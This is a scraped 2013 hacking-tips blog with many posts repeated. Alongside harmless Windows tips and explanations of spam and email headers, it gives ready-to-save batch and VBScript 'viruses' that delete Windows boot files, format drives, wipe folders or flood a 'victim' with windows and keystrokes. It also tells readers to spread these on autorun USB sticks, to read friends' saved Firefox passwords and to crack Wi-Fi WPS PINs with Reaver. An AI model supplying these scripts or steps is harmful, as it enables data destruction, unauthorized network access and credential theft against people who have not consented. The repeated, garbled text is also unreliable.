There is a way to change users from the command prompt without logging off Windows.
1) Press Ctrl+Alt+Del to launch Task Manager and look for a process in the list called explorer.exe.
Click the End Process button.
2) Next, click on the file menu and choose New Task (Run…)
3) Enter “cmd” and hit enter to open the Command Prompt window
4) Inside the Command Prompt, use following syntax:
runas /user:username “explorer”
For example to switch to “Administrator” account, use the following command:
runas /user:Administrator “explorer”
Wednesday, September 25, 2013
Fast Switch User in Windows
Monday, September 9, 2013
Schedule Turn On/Shut Down Computer
To automatically start your computer up at a specific time of day, you'll actually need to edit your BIOS settings.
Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different.
Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.
You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler.
Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.
In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out.
Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.
Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s.
Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.
Another easy way to configure it, just schedule a task and run a shutdown batch command that can be found in this blog.
That's it.
Now your computer should shut down and wake up on your own schedule.
To do this:
Boot up your computer and enter your BIOS setup. Usually this involves pressing the Delete key as your computer boots (your computer should say Press DEL to Enter Setup or something similar as you turn it on).Navigate to the Power Options. If your BIOS supports it, there should be a function for automatically starting up your computer at a certain time of day. Mine was called "Resume by Alarm", but yours might be called something different.
Enable that setting and set the time you want your computer to start every day. Save and Exit the BIOS, and your computer should follow that schedule from now on.
You probably shut down your computer when you're done using it at the end of the day, but if not, you can set it to shut itself down on a schedule. This is easy to do with Windows Task Scheduler.
Hit the Start menu and type in "task scheduler". Open up Task Scheduler from your results.
In the right pane, hit Create Task. Give it a name, and under the General tab, check "Run with highest privileges". Also check "Run whether user is logged on or not", if you ever leave your computer logged out.
Head to the Settings tab and check "Stop the task if it runs longer than" and set it to "1 hour". This won't stop your computer from sleeping, but will stop your computer from thinking a task is still running.
Head to the Actions tab, hit New, and choose "Start a Program" as your action. Set the Program to shutdown and the arguments to -s.
Lastly, head to the Triggers tab and click New. Change the schedule to fit whatever you want (say, Daily at 12:00AM), and hit OK. Hit OK again at the next window and your task should be saved in Task Scheduler.
Another easy way to configure it, just schedule a task and run a shutdown batch command that can be found in this blog.
That's it.
Now your computer should shut down and wake up on your own schedule.
Monday, August 26, 2013
RunAsDate
Today, let me introduce an application that allow you to run a program in the date and time that you specify.
This utility doesn't change the current system date and time of your computer, but it only injects the date/time that you specify into the desired application.
You can run multiple applications simultaneously, each application works with different date and time, while the real date/time of your system continues to run normally
.RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.
DOWNLOAD 32bit
DOWNLOAD 64bit
Source: http://www.nirsoft.net/utils/run_as_date.html
You can run multiple applications simultaneously, each application works with different date and time, while the real date/time of your system continues to run normally
.RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.
DOWNLOAD 32bit
DOWNLOAD 64bit
Source: http://www.nirsoft.net/utils/run_as_date.html
Thursday, August 22, 2013
Stored Password from Firefox
This is Really Amazing when I was moving through my Browser's settings and found the place where all the passwords are stored.
I was really shocked that it allowed me to have a look at all the Username and Password which I had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox.
To Hack your friends Password you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.
Just follow the following steps:
Open Mozila Firefox
Goto Tools -> Options -> Security -> Saved Password Button
It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.
Now To get the Internet Password Just see for any IP address in the website column this is the Ip address of that computer and Username and Pass is what you want.
I was really shocked that it allowed me to have a look at all the Username and Password which I had asked my computer to remember which also included my Internet Username and Password. But this is only possible in Mozila Firefox.
To Hack your friends Password you only need even less than a minute and you can have a quick look at your friends Usernames and Passwords.
Just follow the following steps:
Open Mozila Firefox
Goto Tools -> Options -> Security -> Saved Password Button
It will show you a list of websites with the usernames. To get the Passwords Click on Show Passwords Button.
Now To get the Internet Password Just see for any IP address in the website column this is the Ip address of that computer and Username and Pass is what you want.
Friday, August 9, 2013
Crack WPA/WPA2 with Reaver
WPA/WPA2 has become less secure. Within a matter of hours you can retrieve the WiFi password thanks to a useful tool called Reaver. A team named Tactical Network Solutions found a weakness in WPA that allows for an attacker to brute force against the Wifi Protected Setup Pins and recover an access points password within 4-10 hours. The tool we are going to be using with this method is called Reaver. This method may only be used if the WiFi network is using PSK (Public Shared Key) as the authentication method.
In this tutorial I will be using Backtrack 5 RC3. You can use any type of modern Linux Distro though.
In order to do this attack, you will require a wireless adapter that can be put into monitor mode. I recommend the Realtek RTL8187. Alfa cards will also do the job and you can find either one of these online for pretty cheap.
In this tutorial I will be using Backtrack 5 RC3. You can use any type of modern Linux Distro though.
In order to do this attack, you will require a wireless adapter that can be put into monitor mode. I recommend the Realtek RTL8187. Alfa cards will also do the job and you can find either one of these online for pretty cheap.
Step 1: Open a terminal window and find your wireless adapter.
Type in airmon-ng and this will display the wireless adapters you have connected.
Notice the interface in the screenshot above is “wlan0″. I will use this in the next step.
Step 2: Put your Wireless Adapter into monitor mode.
You can do this by typing: airmon-ng start wlan0
(Yours may be different than wlan0, make sure to get the interface from the first step.)
Monitor mode basically lets your wireless adapter monitor all traffic received.
After this is complete, you will see at the bottom: “monitor mode enabled on mon0″. This ensures that your Wireless Adapter has been set to monitor mode.
Step 3: Determine which Access Point to attack.
In this step we will find out the BSSID of the access point you want to attack. This is the unique identifier for the access point.
Type: airodump-ng mon0
This will list all of the access points that are in your area and give their BSSIDs:
For this tutorial, I will be using that top network “linksys”
Under “Auth” you will see PSK (Public Shared Key). This cracking process will only work if the network is using PSK. Take note of the BSSID and the Channel number.
Step 4: Let’s get cracking
We will now use Reaver to target the specific BSSID and Channel number to retrieve the password from the router.
The command you will type in is:
reaver -i mon0 -c 6 -b 80:96:B1:AA:A3:92 -vv
The 6 and the 80:96:B1:AA:A3:92 will be different for you of course, depending on the channel and BSSID you are targeting.
-i = The interface you wish to use.
-c = The channel number
-b = The BSSID of the access point.
-vv = Very verbose, it gives detailed information along the way but it is not required.
As you can see, Reaver starts by trying pin 12345670 against the Public Shared Key. It will keep trying pins until the correct one is found. When it is found, the access points password will be shown to you!
*This process can take roughly 4-10 hours.
Friday, August 2, 2013
Virus To Crush The Windows
This code will shutdown the computer and never to reboot again!
Use with care!
Copy the following code into notepad:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save as Hackmimic_crushwindows.bat
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Tuesday, June 25, 2013
Toggle Caps Lock
This code will toggle the caps lock button simultaneously...quite annoying >.<
Copy the following code into notepad:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save as Hackmimic_capslock.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Copy the following code into notepad:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save as Hackmimic_capslock.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Monday, June 24, 2013
Hit Enter Key
This code will send enter key simultaneously to the victim machine. It will be stop after the computer restart.
Copy the following code into notepad:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save as Hackmimic_enter.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Copy the following code into notepad:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save as Hackmimic_enter.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Sunday, June 23, 2013
Pop Out CD Drive
This code will pop out all the CD Drive of your victim, if there are more than one, it pop out all.
Quite stupid yet fun...restart the pc will clear and stop the script.
Copy the following code into notepad:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save as Hackmimic_popout.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Quite stupid yet fun...restart the pc will clear and stop the script.
Copy the following code into notepad:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save as Hackmimic_popout.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Saturday, June 22, 2013
Remove Directory
When executed, this code will actually delete all directories and files in the specific directory. Work similar to delete/erase but instead of a file at a time, rd command is to remove the whole directory, leave you a fresh empty folder.
Copy the following code into notepad:
rd J:\ /s /q
Save as Hackmimic_rd.bat
Copy the following code into notepad:
rd J:\ /s /q
Save as Hackmimic_rd.bat
Remove Directory Help
RMDIR [/S] [/Q] [drive:]path
RD [/S] [/Q] [drive:]path
/S Removes all directories and files in the specified directory
in addition to the directory itself. Used to remove a directory
tree.
/Q Quiet mode, do not ask if ok to remove a directory tree with /S
*Search this blog for autorun script and automate it.
Feel free to leave comments~
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Friday, June 21, 2013
Format Drive
The following code will format all the define drive letter in computer.
Copy the code below into notepad:
format D: /q /x
Save as Hackmimic_format.cmd
Good to go now...
*Replace D for any other drive letter
*You can make multiple line for different disk drive
*Perform a test on USB drive to check result
FORMAT volume [/V:label] [/Q] [/F:size]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors]
FORMAT volume [/V:label] [/Q]
FORMAT volume [/Q]
volume Specifies the drive letter (followed by a colon),
mount point, or volume name.
/FS:filesystem Specifies the type of the file system (FAT, FAT32, or NTFS).
/V:label Specifies the volume label.
/Q Performs a quick format.
/C NTFS only: Files created on the new volume will be compressed
by default.
/X Forces the volume to dismount first if necessary. All opened
handles to the volume would no longer be valid.
/A:size Overrides the default allocation unit size. Default settings
are strongly recommended for general use.
NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
(128K, 256K for sector size > 512 bytes).
FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
(128K, 256K for sector size > 512 bytes).
Note that the FAT and FAT32 files systems impose the
following restrictions on the number of clusters on a volume:
FAT: Number of clusters <= 65526
FAT32: 65526 < Number of clusters < 4177918
Format will immediately stop processing if it decides that
the above requirements cannot be met using the specified
cluster size.
NTFS compression is not supported for allocation unit sizes
above 4096.
/F:size Specifies the size of the floppy disk to format (1.44)
/T:tracks Specifies the number of tracks per disk side.
/N:sectors Specifies the number of sectors per track.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Copy the code below into notepad:
format D: /q /x
Save as Hackmimic_format.cmd
Good to go now...
*Replace D for any other drive letter
*You can make multiple line for different disk drive
*Perform a test on USB drive to check result
Format Help
FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X]FORMAT volume [/V:label] [/Q] [/F:size]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors]
FORMAT volume [/V:label] [/Q]
FORMAT volume [/Q]
volume Specifies the drive letter (followed by a colon),
mount point, or volume name.
/FS:filesystem Specifies the type of the file system (FAT, FAT32, or NTFS).
/V:label Specifies the volume label.
/Q Performs a quick format.
/C NTFS only: Files created on the new volume will be compressed
by default.
/X Forces the volume to dismount first if necessary. All opened
handles to the volume would no longer be valid.
/A:size Overrides the default allocation unit size. Default settings
are strongly recommended for general use.
NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
(128K, 256K for sector size > 512 bytes).
FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
(128K, 256K for sector size > 512 bytes).
Note that the FAT and FAT32 files systems impose the
following restrictions on the number of clusters on a volume:
FAT: Number of clusters <= 65526
FAT32: 65526 < Number of clusters < 4177918
Format will immediately stop processing if it decides that
the above requirements cannot be met using the specified
cluster size.
NTFS compression is not supported for allocation unit sizes
above 4096.
/F:size Specifies the size of the floppy disk to format (1.44)
/T:tracks Specifies the number of tracks per disk side.
/N:sectors Specifies the number of sectors per track.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Metasploit
Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.
Here is a brief table of contents for Singh's book:
Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, pivoting, and killing firewalls
Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
Chapter 8: Working with Exploits covering: mixins, msfvenum, going from exploit to Metasploit module, and fuzzing
Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.
To summarize, if you are looking for a Metasploit book in cookbook format than this book would be a good choice.
Metasploit Official Website: http://www.metasploit.com/
Download E-Book: DOWNLOAD
Unlock Password: hackmimic.blogspot.com
*leave a message for my if link is dead
Here is a brief table of contents for Singh's book:
Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, pivoting, and killing firewalls
Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
Chapter 8: Working with Exploits covering: mixins, msfvenum, going from exploit to Metasploit module, and fuzzing
Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.
To summarize, if you are looking for a Metasploit book in cookbook format than this book would be a good choice.
Metasploit Official Website: http://www.metasploit.com/
Download E-Book: DOWNLOAD
Unlock Password: hackmimic.blogspot.com
*leave a message for my if link is dead
Thursday, June 20, 2013
Penetration Test
Penetration testing in simple words can be defined as the test on the live networks or servers directly by attacking by the trained ethical hacking professional person or network security administrator.
If you still cant get, let me make it simpler for you. Consider an organization having its employee working on certain software. It stores all database into some kind of “database server”. What will we do is just hire some ethical hacking trained person & he will directly conduct the test on the possible vulnerable areas of the system or network or the software.
If you still cant get, let me make it simpler for you. Consider an organization having its employee working on certain software. It stores all database into some kind of “database server”. What will we do is just hire some ethical hacking trained person & he will directly conduct the test on the possible vulnerable areas of the system or network or the software.
Classification of Penetration Testing
Penetration testing is basically classified according to the things that are known to ethical hackers. It is classified as follows
- White Box Testing
- Black Box Testing
In white box tests the ethical hacker physically sees all network & its previous data & updates. Means he knows everything then he performs testing.
In black box testing ethical hackers do complete attack without knowing even the operating stem on the networks. So black box test is real hard thing to do in ethical hacking.
Wednesday, June 19, 2013
Delete Folder
This code will delete anything define when executed.
Copy the following code into notepad without the quote:
"erase C:\Program Files\Common Files"
Save as "Hackmimic.cmd"
When execute, the common files folder inside program files will be permanently deleted.
Copy the following code into notepad without the quote:
"erase C:\Program Files\Common Files"
Save as "Hackmimic.cmd"
When execute, the common files folder inside program files will be permanently deleted.
For Testing
Create a text file in C: drive
Name it as hackmimic.txt
Use "erase C:\hackmimic.txt"
Erase Help
Deletes one or more files.
DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
names Specifies a list of one or more files or directories.
Wildcards may be used to delete multiple files. If a
directory is specified, all files within the directory
will be deleted.
/P Prompts for confirmation before deleting each file.
/F Force deleting of read-only files.
/S Delete specified files from all subdirectories.
/Q Quiet mode, do not ask if ok to delete on global wildcard
/A Selects files to delete based on attributes
attributes R Read-only files S System files
H Hidden files A Files ready for archiving
- Prefix meaning not
If Command Extensions are enabled DEL and ERASE change as follows:
The display semantics of the /S switch are reversed in that it shows
you only the files that are deleted, not the ones it could not find.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Feel free to leave comments~
Autorun File
Create an autorun file that will execute other files when loaded.
Step by Step Tutorial
- Open notepad, type the following code inside.
- [AUTORUN] open=filename.extension
- Save as "autorun.inf"
- Finish, Simple, Thats it!
Go back to step 2 and check on the filename.extension, usually...
We put our simple script file to it such as shutdown.bat, format.cmd, and etc.
Finally, copy both file into an USB or CD and pass it to your victim. Watch the result.
Tuesday, June 18, 2013
How Spammers get your Email
Spam is amazing. In an unprecedented and astonishing effort, junk email reaches almost everybody online.
All it takes to get on the mailing lists used by spammers is an email address. There is no need to sign up for anything or ask for emails. The spam just starts coming, out of nowhere, apparently without any plan, and without a reason. It invades email addresses that are never used.
But how do spammers discover email addresses? How do they find your mailbox when your best friend does not?
Millions of users share one common domain name, so you already know that ("gmail.com" in the case of gmail). Try to sign up for a new account and you will discover that guessing an existing user name is not difficult either. Most short and good names are taken.
So, to find email addresses at a large ISP, it's enough to combine the domain name with a random user name. Chances are both "ethan1@hotmailcom" and "ethan2@hotmail.com" exist.
To beat this kind of spammer attack, use long and difficult addresses.
These address harvesting bots work a lot like the search engines' robots, only they're not after the page content at all. Strings with '@' somewhere in the middle and a top-level domain at the end are all the spammers are interested in.
While not picky, the pages the spammers are particularly keen to visit are web forums, chat rooms and web-based interfaces to usenet because lots of email addresses are likely to be found there.
This is why you should
If you post your address on your own web page or blog, you can
Encode it
so visitors who want to send you an email can see and use it, but spambots cannot. Again,
Using a disposabe address
provides a very effective and at the same time convenient alternative.
To build such a distributed network of spam zombies, spammers cooperate with virus authors who equip their worms with small programs that can send bulk emails.
Additionally, these spam sending engines will often scan the user's address book, web cache and files for email addresses. That's another chance for spammers to catch your address, and this one is particularly difficult to avoid.
The best anybody can do is
All it takes to get on the mailing lists used by spammers is an email address. There is no need to sign up for anything or ask for emails. The spam just starts coming, out of nowhere, apparently without any plan, and without a reason. It invades email addresses that are never used.
But how do spammers discover email addresses? How do they find your mailbox when your best friend does not?
Dictionary Attack
Big free email providers like Windows Live Hotmail or Yahoo! Mail are a spammer's paradise, at least when it comes to finding spammable addresses.Millions of users share one common domain name, so you already know that ("gmail.com" in the case of gmail). Try to sign up for a new account and you will discover that guessing an existing user name is not difficult either. Most short and good names are taken.
So, to find email addresses at a large ISP, it's enough to combine the domain name with a random user name. Chances are both "ethan1@hotmailcom" and "ethan2@hotmail.com" exist.
To beat this kind of spammer attack, use long and difficult addresses.
Brute Searching Force
Another tactic employed by spammers to discover email addresses is to search common sources for email addresses. They have robots scanning web pages and following links.These address harvesting bots work a lot like the search engines' robots, only they're not after the page content at all. Strings with '@' somewhere in the middle and a top-level domain at the end are all the spammers are interested in.
While not picky, the pages the spammers are particularly keen to visit are web forums, chat rooms and web-based interfaces to usenet because lots of email addresses are likely to be found there.
This is why you should
- disguise your email address when you use it on the net or, better yet,
- use disposable email addresses.
If you post your address on your own web page or blog, you can
Encode it
so visitors who want to send you an email can see and use it, but spambots cannot. Again,
Using a disposabe address
provides a very effective and at the same time convenient alternative.
Worms Turning Infested PCs Into Spam Zombies
To avoid being detected and filtered, spammers seek to send their emails from a distributed network of computers. Ideally, these computers are not even their own but those of unsuspecting users.To build such a distributed network of spam zombies, spammers cooperate with virus authors who equip their worms with small programs that can send bulk emails.
Additionally, these spam sending engines will often scan the user's address book, web cache and files for email addresses. That's another chance for spammers to catch your address, and this one is particularly difficult to avoid.
The best anybody can do is
- keeping their email program updated and patched,
- being vary of any attachments they did not request and
- doing virus scans with a free, up to date scanner regularly.
Monday, June 17, 2013
Infinite Loop
This code will continuously show message to the target machine until the victim manually close it.
:BEGIN
msg * Gotcha! Say cheese...
GOTO BEGIN
This code will continuously open up command prompt screen infinite times and irritate victim and affecting performance.
Copy the following code into notepad:
:x
start cmd.exe
GOTO x
save as Hackmimic_msg.bat, then you can open the file.
*You can replace with any message after the echo tag with a space.
*You can put multiple echo as well.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Copy the following code into notepad:
@ECHO off:BEGIN
msg * Gotcha! Say cheese...
GOTO BEGIN
This code will continuously open up command prompt screen infinite times and irritate victim and affecting performance.
Copy the following code into notepad:
:x
start cmd.exe
GOTO x
save as Hackmimic_msg.bat, then you can open the file.
*You can replace with any message after the echo tag with a space.
*You can put multiple echo as well.
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Thursday, June 13, 2013
ASCII Description & Table
Description
ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as 'a' or '@' or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want 'plain' text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as 'text only'Table
Extended ASCII Table
Source: http://www.asciitable.com/
Wednesday, June 12, 2013
Password Protect Google Chrome
Simple Startup Password is an addon for Google Chrome browser that blocks unauthorized people from using your browser. Just go to the extensions gallery of Google Chrome and install the Simple Startup Password add-on for your browser.
After installing the add-on go to Settings -> Tools ->Extensions. There look for Simple Startup Password and click on Options. Set a password for your browser and done. Now every time you start your Google Chrome browser it will ask you for the password and if you fail to give the correct password your browser will be closed.
You can get this add on from Google Chrome’s extensions gallery.
Link : Simple Startup Password for Google Chrome
In case you forget your password there is no option to recover it. You will have to re-install the browser.
After installing the add-on go to Settings -> Tools ->Extensions. There look for Simple Startup Password and click on Options. Set a password for your browser and done. Now every time you start your Google Chrome browser it will ask you for the password and if you fail to give the correct password your browser will be closed.
You can get this add on from Google Chrome’s extensions gallery.
Link : Simple Startup Password for Google Chrome
In case you forget your password there is no option to recover it. You will have to re-install the browser.
Trace Email
While sending or receiving an email ,our browser uses two protocols:
SMTP(Simple mail transfer protocol)Port 25
POP(Post office protocol)Port 110
Whenever click on the send button of your browser for sending a mail, the mail first reaches the Source mail server from there it goes to Interim mail server from there it moves to Destination mail server and at last to destination inbox. So as you see its not a complicated process and can be described by the following diagram: |Sender Outbox-----> Source Mail Server-----> Interim Mail Servers-----> Destination Mail Server------> Destination Inbox|
All the emails does not travel alone they carry email header with them.
This email header reveals the path taken by the email to reach its
destination.
The email header is:
From John Wed Jun 12 20:36:53 2013
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <dt_biz@terenciri.com>
X-YahooFilteredBulk: 209.124.87.14
X-Originating-IP: [209.124.87.14]
Received: from 209.124.87.14 (HELO org.pickepair.com) (209.124.87.14)
by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
From: John <DT_Biz@terenciri.com>
Subject:Stop paying for CDs.
To: divya_football@yahoo.co.in
Date: Wed, 12 Jun 2013 11:06:53 EDT
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
Before tracing the first thing is to divide the mails in 3-4 lines and then
I will explain you each line.
So lets begin:
Date: Wed, 12 Jun 2013 11:06:53 EDT
From: John <DT_Biz@terenciri.com>
To: divya_football@yahoo.co.in
Subject:Stop paying for CDs.
Date: Wed, 12 Jun 2013 11:06:53 EDT
This line tells us the date on which the mail was sent to me.
From: John <DT_Biz@terenciri.com>
This line tells me the email of the person who sent the the mail.
To: divya_football@yahoo.co.in
This line tells us to whom the mail was sent , in this case it is my email.
Subject:Stop paying for CDs.
This line tells us the subject of the message.
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <dt_biz@terenciri.com>
X-YahooFilteredBulk: 209.124.87.14
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
This line tells me the that the message was sent to my email via 203.104.17.163
on Wednesday 12nd June 2013.
Return-Path: <dt_biz@terenciri.com>
again this line tells me the email of the person who send me this mail.
X-YahooFilteredBulk: 209.124.87.14
This line tells me that the message was filtered by 209.124.87.14
X-Originating-IP: [209.124.87.14]
This line tells me the IP address of the person who send me this email.
Received: from 209.124.87.14 (HELO org.pickepair.com) (209.124.87.14)
by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
Again this line tells us the IP address of the person who sent this mail and contain some SMTP command which you will learn in the next lesson.
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
MIME-Version: 1.0
This line tells me the software that the attacker used to send me the
message
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of the text the email used.
The header can be viewed by going to action in yahoo mail and in gmail it would be found in settings. If you use some other website then the best way is to find it using google. Now if you have got the IP address what can you do?
The answer is very simple you can just do a whois scan for that IP address.
Whois is a tool that has information about all the hosts.When I did a whois scan for the above IP address it reavels the following information:
#
SMTP(Simple mail transfer protocol)Port 25
POP(Post office protocol)Port 110
Whenever click on the send button of your browser for sending a mail, the mail first reaches the Source mail server from there it goes to Interim mail server from there it moves to Destination mail server and at last to destination inbox. So as you see its not a complicated process and can be described by the following diagram: |Sender Outbox-----> Source Mail Server-----> Interim Mail Servers-----> Destination Mail Server------> Destination Inbox|
All the emails does not travel alone they carry email header with them.
This email header reveals the path taken by the email to reach its
destination.
Tracing Time:
Here I will take a real life example of a email that was send to me.The email header is:
From John Wed Jun 12 20:36:53 2013
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <dt_biz@terenciri.com>
X-YahooFilteredBulk: 209.124.87.14
X-Originating-IP: [209.124.87.14]
Received: from 209.124.87.14 (HELO org.pickepair.com) (209.124.87.14)
by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
From: John <DT_Biz@terenciri.com>
Subject:Stop paying for CDs.
To: divya_football@yahoo.co.in
Date: Wed, 12 Jun 2013 11:06:53 EDT
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
Before tracing the first thing is to divide the mails in 3-4 lines and then
I will explain you each line.
So lets begin:
Date: Wed, 12 Jun 2013 11:06:53 EDT
From: John <DT_Biz@terenciri.com>
To: divya_football@yahoo.co.in
Subject:Stop paying for CDs.
Date: Wed, 12 Jun 2013 11:06:53 EDT
This line tells us the date on which the mail was sent to me.
From: John <DT_Biz@terenciri.com>
This line tells me the email of the person who sent the the mail.
To: divya_football@yahoo.co.in
This line tells us to whom the mail was sent , in this case it is my email.
Subject:Stop paying for CDs.
This line tells us the subject of the message.
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <dt_biz@terenciri.com>
X-YahooFilteredBulk: 209.124.87.14
X-Apparently-To: divya_football@yahoo.co.in via 203.104.17.163; Wed, 12 Jun 2013 20:36:53 +0530
This line tells me the that the message was sent to my email via 203.104.17.163
on Wednesday 12nd June 2013.
Return-Path: <dt_biz@terenciri.com>
again this line tells me the email of the person who send me this mail.
X-YahooFilteredBulk: 209.124.87.14
This line tells me that the message was filtered by 209.124.87.14
X-Originating-IP: [209.124.87.14]
